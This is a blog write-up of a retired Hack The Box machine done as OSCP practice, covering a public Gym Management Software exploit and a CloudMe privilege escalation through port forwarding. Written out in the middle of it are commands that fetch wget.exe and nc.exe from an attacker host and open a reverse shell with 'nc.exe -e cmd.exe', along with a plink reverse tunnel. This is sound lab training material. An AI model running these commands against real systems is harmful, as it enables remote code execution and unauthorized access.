Continuing on my road to OSCP certification, I am in the midst of preparation for the exams in January. Part of my preparation is to take on the retired machines available in Hack in The Box (HTB) platform. This platform is a great platform for practicing and learning new penetration testing skills as well as taking on the challenge of “capturing the flag” on their machines.
In this HTB series, I will be sharing my write-ups on all the retired machines that I have and will attempt. If you are wondering, “How does he know which machine to do to prepare for OSCP?” Well, I am using TjNull list of OSCP-like boxes in HTB which can be found here
This box was pretty straightforward. The initial shell was easy to obtain because public exploit was available and it was just how we utilise it to obtain user shell. The privilege escalation portion, however, was where I rabbit holed a bit and found the service that was listening locally that I could exploit again, with a public exploit. The interesting about this is how I had to utilise port forwarding technique to achieve and obtain a shell with Administrator Privileges.
Recon Phase
To begin with this box, we first carry out our basic Reconnaissance. For me, I used AutoRecon which is developed and scripted by Tib3rius. It is one of my fundamental scans I make before moving on to more manual enumeration for specific ports or applications. From the full port Nmap scan results done by AutoRecon:
We see two ports open: 7680 and 8080. Port 8080 is Apache 2.4.43 and it is probably a web application running on PHP 7.4.6. This is probably the port we want to start on.
Information Gathering
Browsing on the web browser:
We see a web page that sees to be about health and wellness. We also see a sign in page for the users.
On the Contact, we see something quite interesting:
Here we see that this webpage we are seeing is made using Gym Management Software 1.0. If we were to google this software with its version number, we immediately get a hit on a public exploit that we can utilise:
Grabbing the exploit after reading it on exploitdb:
We see that we obtained a web shell successfully! However, this shell is not the most stable (it is a bit funky) and we want to get a better foothold.
Setting up a python server where nc.exe
and wget.exe
is located, we then use PowerShell to transfer our wget.exe over to the victim machine using the webshell and then running wget.exe
to grab our nc.exe
over to the victim machine. Lastly, using the nc.exe
, we can use it to create a reverse shell from the victim machine to the attacking machine. All this is done below:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3/wget.exe','C:\xampp\htdocs\gym\upload\wget.exe')"wget.exe http://10.10.16.3/nc.exenc.exe -nv 10.10.16.3 4444 -e cmd.exe
On our listener, we obtained our initial shell and from there obtaining our user.txt
:
Privilege Escalation
Information Gathering
Transferring our enumeration batch file over after setting up a python http server on our directory where winPEAS.bat
is at:
After running the winPEAS.bat file, we notice something interesting in the ports that are currently listening on this machine:
We also found an executable on manual enumeration of the user’s folder:
When I did a bit of googling, I found a public exploit available for a software CloudMe 1.11.2 which seems to match the executable that I found:
Using Searchsploit, I would also find something similar but with a local implementation which is what we needed as this port can only be accessed from within the machine. Grabbing that exploit:
Exploitation
We also need to change our shellcode payload in the public exploit so that we can utilise it, so using msfvenom to generate our shellcode payload, using a similar command found in the commented section for the shellcode in the public exploit:
Modifying the public exploit to load our own shellcode payload:
Since this exploit can only be done locally, and we do not have python3 on the server. We look to using port forwarding technique that will allow us to forward traffic from our port to the targeted port on the victim machine. This will allow us to execute the exploit locally on our attacking machine and reroute the output of the execution as input to the port where CloudMe is listening on the victim machine which is port 8888.
plink64.exe -ssh -l hack -pw hack -N -R 10.10.16.3:8001:127.0.0.1:8888 10.10.16.3
After running the command above, we verify that the port forwarding is successful:
Then running the CloudMe executable to start the service on port 8888:
Then running the exploit:
Then on our listener:
We managed to get a shell as Administrator! Then grabbing our root.txt
flag:
Learning Points
The main learning point here for me playing as the offensive role here, was the port forwarding. I had to recall and remember how to do it via port forwarding and furthermore, understand how it works. I would not say that I got it 100% down, but I can understand the reason why we need to master port forwarding to pivot or to access local ports. This was a good machine to put that to practice.
Thank you for reading! And like always if you enjoy this write-ups, subscribe to my publications or follow me on twitter @lojomojo96 and hit me up with a DM! It will really encourage me to write and share even as I prepare for my OSCP Certification. Of course, if there are points to improve upon my own methodology, do let me know too! You can also find me on LinkedIn as well!